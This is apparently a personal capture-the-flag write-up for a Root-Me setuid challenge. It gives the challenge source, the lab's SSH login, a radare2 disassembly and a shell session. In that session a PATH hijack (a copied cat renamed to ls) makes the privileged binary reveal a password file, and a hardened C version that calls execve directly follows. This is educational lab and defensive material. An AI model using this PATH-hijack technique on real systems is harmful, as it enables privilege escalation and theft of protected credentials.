ctf-notes/app/bash-system-1/notes.org
Tuan-Dat Tran a412c6432e init
Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
2026-03-21 12:44:26 +01:00


Bash - System 1

Challenge: https://www.root-me.org/de/Herausforderungen/App-Script/ELF32-System-1

Challenge source code:

    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>

    int main(void)
    {
        setreuid(geteuid(), geteuid());
        system("ls /challenge/app-script/ch11/.passwd");
        return 0;
    }

Access credentials for the exercise:

- Host: challenge02.root-me.org
- Protocol: SSH
- Port: 2222
- SSH access: ssh -p 2222 app-script-ch11@challenge02.root-me.org
- Username: app-script-ch11
- Password: app-script-ch11

On the system there is a ch11 binary, which is the compiled version of the above program. Opening the compiled program in r2, we can see:

$ r2 r ./ch11
[0x0000058d]> aaaa
[0x0000058d]> afl
[0x0000058d]> s main
[0x0000058d]> pdf
/ 89: int main (char **argv);
|           ; var int32_t var_ch @ ebp-0xc
|           ; arg char **argv @ esp+0x34
|           0x0000058d      8d4c2404       lea ecx, [argv]
|           0x00000591      83e4f0         and esp, 0xfffffff0
|           0x00000594      ff71fc         push dword [ecx - 4]
|           0x00000597      55             push ebp
|           0x00000598      89e5           mov ebp, esp
|           0x0000059a      56             push esi
|           0x0000059b      53             push ebx
|           0x0000059c      51             push ecx
|           0x0000059d      83ec0c         sub esp, 0xc
|           0x000005a0      e8ebfeffff     call sym.__x86.get_pc_thunk.bx
|           0x000005a5      81c32b1a0000   add ebx, 0x1a2b
|           0x000005ab      e850feffff     call sym.imp.geteuid        ; uid_t geteuid(void)
|           0x000005b0      89c6           mov esi, eax
|           0x000005b2      e849feffff     call sym.imp.geteuid        ; uid_t geteuid(void)
|           0x000005b7      83ec08         sub esp, 8
|           0x000005ba      56             push esi
|           0x000005bb      50             push eax
|           0x000005bc      e85ffeffff     call sym.imp.setreuid
|           0x000005c1      83c410         add esp, 0x10
|           0x000005c4      83ec0c         sub esp, 0xc
|           0x000005c7      8d83a0e6ffff   lea eax, [ebx - 0x1960]
|           0x000005cd      50             push eax                    ; const char *string
|           0x000005ce      e83dfeffff     call sym.imp.system         ; int system(const char *string)
|           0x000005d3      83c410         add esp, 0x10
|           0x000005d6      b800000000     mov eax, 0
|           0x000005db      8d65f4         lea esp, [var_ch]
|           0x000005de      59             pop ecx
|           0x000005df      5b             pop ebx
|           0x000005e0      5e             pop esi
|           0x000005e1      5d             pop ebp
|           0x000005e2      8d61fc         lea esp, [ecx - 4]
\           0x000005e5      c3             ret

app-script-ch11@challenge02:~$ cp /bin/cat /tmp/ls
app-script-ch11@challenge02:~$ ll /tmp/
ls: cannot open directory '/tmp/': Permission denied
app-script-ch11@challenge02:~$ ls -lah /tmp/
ls: cannot open directory '/tmp/': Permission denied
app-script-ch11@challenge02:~$ PATH="/tmp/"
app-script-ch11@challenge02:~$ ./ch11
!oPe96a/.s8d5
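
The session above works because system() passes its string to /bin/sh, which resolves the bare name ls through the caller's PATH while the process runs with the target's uid. As an added example (not part of the original notes or the challenge), here is a hardened form of the challenge program that uses no shell and no PATH lookup; the location /bin/ls, the fixed environment and the helper name run_ls are assumptions of this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed absolute location of ls; adjust for the target system. */
#define LS_BIN "/bin/ls"

/* Hypothetical helper: runs ls on one target without a shell.
 * Returns the exit status of ls, or -1 on fork/wait failure. */
int run_ls(const char *target)
{
    /* Fixed environment: the caller's PATH, IFS, LD_* etc. are not inherited. */
    char *const envp[] = { "PATH=/usr/bin:/bin", "LC_ALL=C", NULL };
    /* "--" ends option parsing, so target is never read as a flag. */
    char *const argv[] = { "ls", "--", (char *)target, NULL };

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* execve() takes a full path and never consults PATH. */
        execve(LS_BIN, argv, envp);
        _exit(127); /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Same privilege handling as the challenge source, with the result checked. */
    if (setreuid(geteuid(), geteuid()) != 0) {
        perror("setreuid");
        return 1;
    }
    /* Path taken from the challenge source above. */
    return run_ls("/challenge/app-script/ch11/.passwd");
}
```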